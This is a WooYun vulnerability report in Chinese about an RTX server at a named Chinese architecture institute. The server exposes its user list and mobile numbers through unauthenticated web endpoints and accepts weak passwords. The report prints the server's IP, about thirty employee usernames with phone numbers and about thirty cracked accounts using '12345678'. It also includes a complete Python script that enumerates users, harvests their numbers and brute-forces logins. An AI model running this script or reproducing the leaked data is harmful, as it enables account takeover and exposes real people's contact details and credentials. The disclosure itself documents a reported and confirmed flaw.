
漏洞概要

缺陷编号:wooyun-2014-048585

漏洞标题:rtx服务器结合弱口令泄漏员工帐号密码

相关厂商:中国建筑设计研究院(集团)

漏洞作者: l137

提交时间:2014-01-11 19:14

修复时间:2014-02-25 19:14

公开时间:2014-02-25 19:14

漏洞类型:用户资料大量泄漏

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:



漏洞详情

披露状态:

2014-01-11: 细节已通知厂商并且等待厂商处理中
2014-01-16: 厂商已经确认,细节仅向厂商公开
2014-01-26: 细节向核心白帽子及相关领域专家公开
2014-02-05: 细节向普通白帽子公开
2014-02-15: 细节向实习白帽子公开
2014-02-25: 细节向公众公开

简要描述:

RTX server 存在通过 Web 接口暴露用户信息的漏洞。

详细说明:

http://123.127.50.2:8012/userlist.php #泄漏公司所有rtx用户
http://123.127.50.2:8012/getmobile.cgi?receiver= #泄漏用户手机号
http://123.127.50.2:8012/check.php #验证弱口令


2250    zhangs  13683322935
2251 caob 13501098519
2252 luowb 13522144977
2253 lux 13522972058
2254 guihs 18611711855
2256 chengy 13401018026
2257 liuwei 13002155094
2258 lvjg 18611834789
2259 yaojr 13718722130
2260 sunqian 13260483072
2262 zhangjy 15010082958
2263 zhangp 13910709381
2264 xusong 13240188638
2266 liangt 13901385904
2267 jiangsh 13466319132
2269 wangyn 13910397679
2270 xianjh 13671182230
2271 zhaox 15910832790
2272 shaozh 13520275077
2274 weisw 13120452627
2275 louln 13661310480
2276 sunqx 13910323073
2277 zhangyan 13718430085
2278 zhangsuy 13611011805
2281 jinll 13011099030
2282 wancx 13501107909
2283 liudw 13910769115
2284 liuzw 15811128783
2285 wanghui 13466711828
...... 共940+条记录


弱口令可登录
Brute force starting....
Please input the number of threads for brute force(default 10) :
And it will take a little time ...
username password
zhangm 12345678
songdj 12345678
haoxq 12345678
yuy 12345678
jianghb 12345678
tongl 12345678
yinzy 12345678
sunyb 12345678
wangmz 12345678
wancx 12345678
liudw 12345678
yulei 12345678
wanghui 12345678
xuelei 12345678
xuyc 12345678
liuf 12345678
chenye 12345678
mahong 12345678
liuzx 12345678
liuyy 12345678
changh 12345678
zhuanggw 12345678
zhangj02 12345678
zhangd 12345678
wangk 12345678
sungr 12345678
chengxf 12345678
guyu 12345678
hexw 12345678
wangqi 12345678


rtx check脚本

#!/usr/bin/env python
#-*-coding=utf-8-*-
# date : 2013.12.16
# rtx hack
import threading
import urllib
import re
import sys
import getopt
import json
import threading
import httplib
import time
def usage():
    """Print the command-line help text to stdout.

    The help text names the script as ``./f.py``; the only documented
    options are ``-u target_ip`` and ``-h``.  Python 2 print statement.
    """
    print '''
Usage : ./f.py -u target_ip
-h Show this page!
'''
class postThread(threading.Thread):
    """Thread subclass that prints its whole ``data`` once per element.

    NOTE(review): nothing in this file instantiates ``postThread``; the
    brute-force phase below uses ``threading.Thread(target=...)`` directly,
    so this class is dead code as far as the listing shows.
    """

    def __init__(self, data):
        threading.Thread.__init__(self)
        # Stored as-is; ``run`` only iterates it for the element count.
        self.data = data
    def run(self):
        # Prints the entire ``self.data`` container on every iteration
        # (not the current element ``x``), so output repeats len(data) times.
        for x in self.data:
            try:
                print self.data
            except Exception, e:
                print e

class rtx(object):
    """Driver for the three RTX web endpoints described in this report.

    The constructor performs everything in sequence once given a valid
    dotted IPv4 string:

    1. ``GET /userlist.php``            -> JSON list of user records
       (each record is used with keys ``id`` and ``name``),
    2. ``GET /getmobile.cgi?receiver=`` -> one request per user; the raw
       response body is stored as ``phone`` and appended to ``out.txt``,
    3. ``POST /check.php``              -> form fields ``user``/``pwd``,
       a short fixed candidate list plus the user name, from 1-15 threads.

    None of the requests carries any authentication, which is the
    exposure the report describes.  From the server side the visible
    signature is one list fetch, one ``getmobile.cgi`` request per user,
    then a burst of ``check.php`` POSTs from a single source; requiring
    authentication on the first two endpoints and rate-limiting / lockout
    on ``check.php`` are the corresponding mitigations.

    Python 2 only: print statements, ``except X, e``, ``urllib.urlopen``,
    ``httplib``, ``xrange``, ``raw_input`` and ``file()`` are all used.
    """
    ip = ''
    data = ''        # replaced by the parsed JSON list in __init__
    port = '8012'    # kept as a string; used in URLs and passed to httplib

    fullData = ''    # never read or written anywhere in this class

    def __init__(self, ip):
        """Validate ``ip`` and, if it looks like IPv4, run all phases.

        Any IOError/ValueError while fetching or parsing ``userlist.php``
        prints a "not vulnerable" line and exits the process.  A string
        that fails ``checkIp`` only prints an ASCII-art banner.
        """
        if self.checkIp(ip):
            self.ip = ip
            url = "http://"+ip+":"+self.port+"/userlist.php"
            try:
                content = urllib.urlopen(url).read()
                # Expected to be a JSON array of objects; see checkPhone.
                self.data = json.loads(content)
            except (IOError,ValueError),e:
                # \033[1;31m / \33[0m are ANSI bold-red / reset sequences.
                print "\033[1;31m"+self.ip+"\33[0m is not vulnerable!"
                sys.exit()
            self.checkVulnerable()
            #print self.data
            self.checkPhone()
            self.bruteforce()
        else:
            # Banner only; no network activity on this branch.
            print " ______________"
            print " \033[07m are you kidding me? \033[27m "
            print " \ "
            print " \ \033[1;31m,__,\033[1;m "
            print " \ \033[1;31m(\033[1;moo\033[1;31m)____\033[1;m "
            print " \033[1;31m(__) )\ \033[1;m "
            print " \033[1;31m ||--|| \033[1;m\033[05m*\033[25m\033[1;m [ l137 | lietdai@gmail.com ]\r\n\r\n"
    @staticmethod
    def checkIp(ip):
        """Return True when ``ip`` starts with a dotted-quad IPv4 address.

        ``re.match`` anchors only at the start and the pattern ends in
        ``\\b``, so trailing text after a word boundary (e.g. a space) is
        still accepted; this is a format check, not reachability.
        """
        pattern = r"\b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b"
        if re.match(pattern, ip):
            return True
        else:
            return False
    def checkVulnerable(self):
        """Report the record count; despite the name, performs no check.

        ``self.data`` was already fetched and parsed in ``__init__``; this
        only prints ``len(self.data)``.
        """
        print "\033[1;31m Oh...I got something!!"
        print " Please wait a bit....."
        #for x in range(len(self.data)):
        # print self.data[x]
        print " "+str(len(self.data))+" records was found!! \033[0m"
    def checkPhone(self):
        """Fetch ``getmobile.cgi?receiver=<name>`` for every record.

        The raw response body is stored as ``record['phone']`` and one
        tab-separated ``id  name  phone`` line per record is written to
        ``out.txt`` in the current directory (overwritten each run).
        Only the write/print is guarded by try/except; the fetch itself
        is not.
        """
        print "\033[1;31m Now check phone number in records.....\033[0m"
        url = "http://"+self.ip+":"+self.port+"/getmobile.cgi?receiver="
        output = file('out.txt','w')
        for x in xrange(0,len(self.data)):
            # ``name`` is appended to the URL without any escaping.
            url2 = url + self.data[x]['name']
            self.data[x]['phone'] = urllib.urlopen(url2).read()
            try:
                output.write(str(self.data[x]['id'])+'\t'+self.data[x]['name']+'\t'+self.data[x]['phone']+'\n')
                print self.data[x]
            except Exception,e:
                print e
        output.close()
        print "\033[1;31m put the records int out.txt\033[0m"
        #print self.data
    def bruteforce(self):
        """Prompt for a thread count and fan ``fwork`` out over ``self.data``.

        Empty input means 10 threads; anything non-integer or outside
        1-15 exits the process.  ``self.data`` is cut into ``num`` slices
        (Python 2 integer division; the last slice takes the remainder),
        one ``threading.Thread`` per slice.  Threads are started but never
        joined, so the method returns before the requests finish.
        """
        print "\033[1;31m Brute force starting...."
        num = raw_input(" Please input the number of threads for brute force(default 10) : ")
        print " And it will take a little time ...\033[0m"
        if num == '':
            num = 10
        else :
            try :
                num = int(num)
            except ValueError,e:
                print e
                sys.exit()
        if (num < 1) or (num > 15):
            print "threads must in 1-15"
            sys.exit()

        threads = [];
        block = len(self.data)/num
        for i in xrange(0, num):
            if i == num-1:
                data = self.data[block*i:]
            else:
                data = self.data[i*block:(i+1)*block]
            t = threading.Thread(target=self.fwork, args = (self.port, self.ip, data))
            threads.append(t)
        for i in threads:
            i.start()
    @staticmethod
    def fwork(port,ip,b):
        """Worker: POST ``/check.php`` once per candidate for each record in ``b``.

        Candidates are the eight fixed strings below plus the record's own
        ``name`` (so ``len(dicts)`` requests per record).  A new
        ``httplib.HTTPConnection`` (30 s timeout) is opened per request.
        The inner loop reuses the name ``x``, which hides the outer index;
        the user name is therefore recovered as ``dicts[-1]``.
        """
        for x in xrange(0,len(b)):
            dicts = ['111111','123456','qweasd','222222','12345678','000000','qusiba','666666']
            #dicts.append(b[x]['phone'])
            dicts.append(b[x]['name'])
            for x in dicts:
                httpClient = None
                try:
                    name = dicts[-1]
                    postData = urllib.urlencode({'user':name,'pwd':x})
                    headers = {"Content-type":"application/x-www-form-urlencoded", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"};
                    httpClient = httplib.HTTPConnection(ip, port, timeout=30)
                    httpClient.request("POST", "/check.php", postData, headers)
                    response = httpClient.getresponse()
                    responseHeader = response.getheaders()
                    # "Success" is inferred solely from the value of the
                    # second response header being the string '2573'; the
                    # header name is never checked and the body is not read.
                    # Which header this is cannot be told from here.
                    if responseHeader[1][1] == '2573':
                        print name,x
                except Exception, e:
                    print e
                finally:
                    # Raises AttributeError if httpClient is still None.
                    httpClient.close()
    def getWeakPass(self):
        """Read ``password.txt`` line by line into ``self.dists``.

        NOTE(review): ``self.dists`` is not defined anywhere in this class
        and nothing in this file calls ``getWeakPass``; as written it would
        raise AttributeError on the first line.
        """
        file_ob = open("password.txt")
        try:
            list_file = file_ob.readlines()
        finally:
            file_ob.close()
        for x in list_file:
            self.dists.append(x.strip('\n'))
def main():
    """Parse ``-u IP`` / ``-h`` / ``--help`` and construct ``rtx``.

    Building ``rtx(a)`` runs every phase from its constructor, so ``-u``
    is the whole program; the returned instance ``r`` is not used.
    ``-h`` prints usage but does not exit, so later options still run.
    A getopt error or no options at all prints usage.
    """
    try:
        opts, args = getopt.getopt(sys.argv[1:], "u:h", ["help"])
    except getopt.GetoptError:
        usage()
        sys.exit()
    for o,a in opts:
        if o in ("-h", "--help"):
            usage()
        elif o == "-u":
            r = rtx(a)
        else :
            usage()
    if len(opts) == 0:
        usage()

# Script entry point; importing the module does not run anything.
if __name__ == "__main__" :
    main()

漏洞证明:

Screenshot from 2013-12-28 13:05:39.png

修复方案:

版权声明:转载请注明来源 l137@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2014-01-16 09:14

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过公开联系渠道通报给中国建筑设计研究院处置。

最新状态:

暂无